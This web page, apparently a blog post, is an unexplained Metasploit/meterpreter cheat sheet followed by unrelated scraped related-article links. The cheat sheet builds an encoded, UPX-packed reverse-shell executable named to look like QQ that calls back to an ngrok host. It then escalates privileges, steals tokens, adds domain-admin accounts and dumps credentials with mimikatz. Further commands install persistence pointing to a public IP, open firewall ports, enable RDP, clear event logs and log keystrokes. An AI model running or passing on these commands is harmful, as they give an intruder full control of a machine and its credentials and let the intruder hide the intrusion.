meterpreter Command Sample

==================================================================================================

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i  -b '\x00' LHOST=free.ngrok.cc LPORT= -f c

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i  -b '\x00' LHOST=free.ngrok.cc LPORT= -f exe -o qq.exe

upx - qq.exe -k

==================================================================================================

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.195.45

set lport

set ExitOnSession false

set AutorunScript post/windows/manage/smart_migrate

exploit -j -z

jobs

sessions -i

sysinfo

screenshot

getuid

getsystem

getuid

run post/windows/manage/priv_migrate

background

ps

steal_token PID

drop_token

getuid

use incognito

help incognito

list_tokens -u

list_tokens -g

impersonate_token DOMAIN_NAME\USERNAME

add_user domainuser password -h 192.168.195.191

add_group_user "Domain Admins" domainuser -h 192.168.195.191

run post/windows/gather/smart_hashdump

# http://www.objectif-securite.ch/en/ophcrack.php

use mimikatz

help mimikatz

msv

ssp

kerberos

wdigest

mimikatz_command -f samdump::hashes

mimikatz_command -f sekurlsa::searchPasswords

run post/windows/gather/checkvm

run post/windows/gather/enum_applications

run post/windows/gather/dumplinks

run post/windows/gather/usb_history

run post/windows/gather/enum_devices

execute -f cmd.exe -i -H -t

net user username userpass /add

net localgroup "Administrators" username /add

net user domainuser userpass /add /DOMAIN

net group "Domain Admins" domainuser /add /DOMAIN

netsh firewall add portopening TCP  "Notepad" ENABLE ALL

netsh firewall add portopening TCP  "Notepad" ENABLE ALL

exit

run metsvc

run persistence -X -i  -p  -r 47.90.92.56

run post/windows/manage/enable_rdp

run getgui -e

run getgui -u username -p userpass

# rdesktop -u username -p userpass server[:port]

clearev

run post/windows/capture/keylog_recorder

==================================================================================================

meterpreter Command Sample的更多相关文章

  1. POJ-1028 Web Navigation 和TOJ 1196. Web Navigation

    Standard web browsers contain features to move backward and forward among the pages recently visited ...

  2. 北大poj- 1028

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 33281   Accepted: 14836 ...

  3. POJ 1028题目描述

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  4. hdu 1509 Windows Message Queue

    题目连接 http://acm.hdu.edu.cn/showproblem.php?pid=1509 Windows Message Queue Description Message queue ...

  5. 小学生玩ACM----优先队列

    思来想去,本人还是觉得,这个优先队列啊,不学不行,怎么说咧?虽说有时候我可以模仿它的功能,但是有的题目会坑的我大放血,况且多学会用一个小东东总不会伤身的撒,何况我是永举不垂的,哦耶,嘿嘿 优先队列嘛就 ...

  6. Web Navigation

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  7. hdoj 1509 Windows Message Queue【优先队列】

    Windows Message Queue Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Ot ...

  8. SOSEx ReadMe

    Quick Ref:--------------------------------------------------bhi [filename] BuildHeapIndex - Builds a ...

  9. POJ-1028(字符串模拟)

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 31906   Accepted: 14242 ...

随机推荐

  1. spring requestbody json

    1  @requestbody string param 前台将jsonobject序列化成字符串 后台解析成JsonObject 2 @requestbody map<string,objec ...

  2. mysql数据按条件导出

    仅导出部分数据: mysqldump -hlocalhost -uuser -p --skip-triggers --no-create-info dbname tbname -w "id ...

  3. Robomongo可视化命令

    ## 更新命令示例 db.getCollection('collection_name').update(    {'_id':ObjectId('id string')},     {$set:{' ...

  4. 关于DNS

    一.什么是DNS DNS 是域名系统 (Domain Name System) 的缩写,它是由解析器和域名服务器组成的.域名服务器是指保存有该网络中所有主机的域名和对应IP地址,并具有将域名转换为IP ...

  5. drf 的分页功能

    1 settings中配置 page_size = 20 代表每页20条数据 REST_FRAMEWORK = { 'DEFAULT_PARSER_CLASSES': ( 'rest_framewor ...

  6. CSS3小笔记

    border-radius:圆角属性:border-radius:左上,右上,右下,左下.transform:rotate(角度):transparent 透明的三角形的写法设置宽和高为0,设置边框的 ...

  7. 【テンプレート】LCA

    LCA目前比较流行的算法主要有tarjian,倍增和树链剖分 1)tarjian 是一种离线算法,需要提前知道所有询问对 算法如下 1.读入所有询问对(u,v),并建好树(建议邻接表) 2.初始化每个 ...

  8. 有关CSS的一些事

    看到两篇关于CSS的文章,总结的非常好.因为没有那个网站的账号,没法收藏转发,所以把链接贴在这里,分享给大家.这两篇文章对于初学CSS的人来说,总结得很精炼准确,而且通俗易懂.推荐~ 有关CSS的一些 ...

  9. 20180805-Java ByteArrayInputStream类

    ByteArrayInputStream bArray = new ByteArrayInputStream(byte [] a); ByteArrayInputStream bArray = new ...

  10. [CSP-S模拟测试]:trade(反悔贪心)

    题目传送门(内部题62) 输入格式 第一行有一个整数$n$.第二行有$N$个整数:$a_1\ a_2\ a_3\cdot\cdot\cdot a_n$. 输出格式 一行一个整数表示最大收益. 样例 样 ...